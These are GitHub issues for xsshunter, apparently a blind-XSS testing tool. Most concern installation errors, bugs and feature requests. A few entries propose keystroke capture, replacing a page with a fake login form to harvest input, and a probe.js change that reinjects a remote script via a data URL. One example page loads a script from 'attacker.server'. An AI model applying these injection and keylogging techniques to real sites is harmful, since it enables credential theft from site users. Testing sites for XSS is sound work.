mandatoryprogrammer / xsshunter Goto Github PK

This one, combined with #12 , is a really big one. Replace the current DOM content with the contents of another page and change the URL bar's contents and favicon. That way, you can replace the contents of '/dash' with the contents of '/login' and capture the resulting keystrokes. This is why XSS still rules.

Again, source example: https://github.com/Miserlou/XSS-Harvest

I think this hasn't been reported before, but let me know if that is incorrect.

Basically, I was trying to reset my password, but the option is not readily available in the UI. However, I
found that this feature is implemented in https://xsshunter.com/app:

<div class="panel-body">
                <label for="reset_password_username">Username</label><br>
                <input type="text" id="reset_password_username" class="form-control" name="reset_password_username" placeholder="mandatory" autofocus="">

                <button type="button" id="reset_password_button" class="btn btn-primary btn-block">Reset Password</button>
                <button type="button" id="go_back_to_login_form_button" class="btn btn-block">Return to Login Page</button>
            </div>

but even though I receive a password reset confirmation, visiting the URL provided only returns a 404: Not Found error.

Any help would be appreciated.

By the way, extremely useful application. Thanks!

Basically when I include the script two times I get two e-mails, but with the same Probe UUID and Injection Key.

The solution is simple: wrap all of your own code (below the dependencies) in a IIFE. This way variables such as probe_return_data or contact_mothership are not in the global scope and don't mess with each other.

It's not critical, since at least something is collected and it does not crash. But I consider including it multiple times common in Blind XSS, since fields like first name, last name, bio, etc. might be rendered at the same time.

How to test the information returned too much, the current delete function is not too awesome. Can increase bulk delete function or select delete function

https://community.letsencrypt.org/t/acme-v2-and-wildcard-certificate-support-is-live/55579

So that's cool, you could change the readme now.

Hi,
I've just set up a version of xss hunter on my VPS and everything seems ok except that I don't see the result of the payload that have been triggered.

Here you can see the xss triggering in the api logs :

and here is my xss fires page :

Do you have any idea where the bug could come from ? any informations I could give you to investigate ?

Thanks for reading !

This one is simple, please also capture every keyboard and mouse event!

Example: https://github.com/Miserlou/XSS-Harvest

If the xsshunter/api/uploads folder does not exist, the server will respond with 500 errors (failure in the upload_screenshot function) and xss fires will not be recorded.

Checking for the existence of this folder at runtime or initial configuration should solve this issue.

I GET ERROR AS FOLLOWS, CAN YOU HELP?

xsshunter.com took too long to respond.
Try:

Checking the connection
Checking the proxy and the firewall
Running Windows Network Diagnostics
ERR_CONNECTION_TIMED_OUT

Endpoint for querying payload fires doesnt work anymore returns 502

This is a great tool for XSS testing and while I am playing with it, I noticed that if the Root document is an inline SVG image and using the XSSHunter probe, the XSSHunter JS callback fails to trigger.

Here's a change I made to probe.js by adding the following before if( document.readyState == "complete" ) { line that helps:

if( document instanceof SVGDocument ) {
    document.location="data:text/html,%3Cscript src=[HOST_URL]%3E%3C/script%3E";
}

Basically, this is just creating a data url and injecting the script again from an HTMLDocument or it might be just using the data url as the payload.

after setup when i trying login i have message 'true'

I'm trying to take a screenshot of a html pages with an iframe, but xsshunter is not taking the screenshot of the Iframe content.

EXAMPLE:
index.htm

<iframe src="demo_iframe.htm" style="border:2px solid red;"></iframe>
<script src=https://attacker.server></script>

demo_iframe.htm:

<html>
<body style="background-color:powderblue">
<h1>This page is displayed in an iframe</h1>
</body>
</html>

I installed on a fresh install of Ubuntu Server 18.04 in Azure.

PROBLEM
Upon running the ./generate_config.py I encountered the "ImportError: No module named yaml" error.

Running pip install yaml results in:

Collecting yaml
Could not find a version that satisfies the requirement yaml (from versions: )
No matching distribution found for yaml

SOLUTION
Run pip install pyyaml or if you want to install machine-wide run apt-get install python-yaml

I suggest either updating the dependencies or reflect this somewhere in the documentation.

In the file api/apiserver.py, in the logit method, it checks if the type is "warning", but "warn" is passed in.

xsshunterexpress_1 | (node:29) UnhandledPromiseRejectionWarning: Error: Connection timeout
xsshunterexpress_1 | at SMTPConnection._formatError (/app/node_modules/nodemailer/lib/smtp-connection/index.js:774:19)
xsshunterexpress_1 | at SMTPConnection._onError (/app/node_modules/nodemailer/lib/smtp-connection/index.js:760:20)
xsshunterexpress_1 | at Timeout. (/app/node_modules/nodemailer/lib/smtp-connection/index.js:229:22)
xsshunterexpress_1 | at listOnTimeout (internal/timers.js:554:17)
xsshunterexpress_1 | at processTimers (internal/timers.js:497:7)
xsshunterexpress_1 | (node:29) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). To terminate the node process on unhandled promise rejection, use the CLI flag --unhandled-rejections=strict (see https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode). (rejection id: 4)

Hey, I need help in setting up it in my vps.

I have successfully generated the wildcard ssl certificate, and successfully run the generate_config.py. But, when it comes to doing the mv command. It's asking for the postgres password.

But, i don't know the password. I am getting stuck at that place.

Please anyone help me!!!

Did everything like in article https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/index.html but without luck. Index page on the server is the same, any tips to resolve?

Hi there,

Many thanks for this great tool and for Open Sourcing it. I'm having some issues with setting it up. The webservice starts without any problems and I get a nicely working version of xsshunter. However when I try to sign up I get "Invalid Signup Information" in the registration screen. I tried a couple of different variations but all give the same problem.

I've tried searching for errorlogs but there do not seem to be any, (api/logs is empty) also if I run guiserver.py manually it does not echo any errors.

Anything I can do to debug further?

Noticed the //y.vg here:
https://github.com/mandatoryprogrammer/xsshunter/blob/master/api/apiserver.py#L64

I understand that it's a convenience to host this script externally, but it might be nice to decouple this app from a third-party url. I was thinking about os.environ.get('XSS_SERVER_SCRIPT_URL', '//y.vg'). Sound okay?

Someone that not me tried using XSSHunter on my website but i can't fill up the contact form
http://i.imgur.com/hgVzatg.png